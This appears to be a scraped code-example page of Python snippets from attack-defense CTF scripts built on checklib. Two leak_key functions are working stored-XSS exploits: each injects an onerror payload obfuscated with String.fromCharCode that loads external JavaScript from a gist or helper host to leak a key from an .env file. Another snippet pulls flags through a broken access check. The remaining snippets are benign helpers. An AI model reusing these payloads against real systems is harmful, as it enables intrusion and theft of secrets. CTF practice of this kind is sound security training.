Пример #1
0
def leak_key():
    xss_script_url = 'https://gist.githubusercontent.com/jnovikov/7f3d47b45cc8b9696cfe3882cb88f181/raw/4cad1ba6c459fb5c2b86d1b8f15478186c807edc/moim.js'
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()

    s = requests.Session()
    s.post(f'http://{IP}:8000/api/register',
           json={
               'email': email,
               'password': password
           },
           headers={'Accept-Encoding': 'application/json'})

    pwn_url = '<script src="{}"></script>'.format(xss_script_url)

    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)

    sploit = 'document.write(' + '+'.join(pwn_code) + ')'

    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'hehe',
        'description': 'Totally not an exploit',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }

    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
    data = resp.json()
    sync_id = data['id']
    r = s.get(f'http://{IP}:8000/api/sync/{sync_id}/challenge')
    challenge = r.json().get('challenge')
    resp = s.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
                  json={
                      'nickname': 'asd',
                      'challenge_answer': mine_answer(challenge)
                  })
    public_id = resp.json().get('public_id')
    for _ in range(20):
        sleep(0.5)
        r = s.get(f'http://{IP}:8000/api/ticket/' + public_id)
        ticket_data = r.json()
        ticket_url = ticket_data.get('ticket_url')
        if ticket_url:
            url = f'http://{IP}:8000{ticket_url}'
            resp = s.get(url)

            env_file_data = extract_text(resp).decode('utf-8', 'ignore')
            matches = regex.findall(env_file_data)
            if len(matches) == 0:
                return None
            return matches[0]
    else:
        print("Failed to leak key. Timeout", flush=True)
        return None
Пример #2
0
 def register_service(self, password=None):
     username = checklib.rnd_username()
     if not password:
         password = checklib.rnd_password()
     r = requests.get(f'{self.url}/registerForm',
                      params={
                          'login': username,
                          'password': password
                      })
     checklib.check_response(r, 'Could not register')
     return username, password
Пример #3
0
    def _rnd_slave(self, desc, l, r):
        slave = {
            "имя": rnd_username(),
            "описание": desc,
            "цена": randint(l, r),
        }

        for i in range(randint(0, 5)):
            if randint(0, 1) == 0:
                k = rnd_string(5)
                v = rnd_string(10)
                slave[k] = v
            else:
                k = rnd_string(5)
                subslave = {}
                for j in range(randint(1, 3)):
                    ks = rnd_string(4)
                    vs = rnd_string(15)
                    subslave[ks] = vs
                slave[k] = subslave

        return slave
def leak_key():
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()

    s = requests.Session()
    resp = s.post(f'http://{IP}:8000/api/register',
                  json={
                      'email': email,
                      'password': password
                  },
                  headers={'Accept-Encoding': 'application/json'})

    pwn_url = f'<script src="{helper_url}/hckk?ip={IP}"></script>'

    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)

    sploit = 'document.write(' + '+'.join(pwn_code) + ')'

    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'Anime sync!',
        'description': 'Join us at kek on kek',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }

    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)

    data = resp.json()
    sync_id = data['id']

    resp = requests.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
                         json={'nickname': 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='})
    print(resp.text, flush=True)
Пример #5
0
import sys
from checklib import get_initialized_session, rnd_username, rnd_password

ip = sys.argv[1]
PORT = 6091

url = f"http://{ip}:{PORT}/api"

s = get_initialized_session()
u, p = rnd_username(), rnd_password()

s.post(f"{url}/register/",
       json={
           'username': u,
           'password': p,
           'home': 'evilhacker',
       })

s.post(f"{url}/login/", json={
    'username': u,
    'password': p,
})

cid = s.post(f"{url}/code/", json={'work': 'work', 'code': []}).json()['ok']

flags = s.get(f"{url}/code/{cid}/").json()['ok']

for i in flags:
    print(i, flush=True)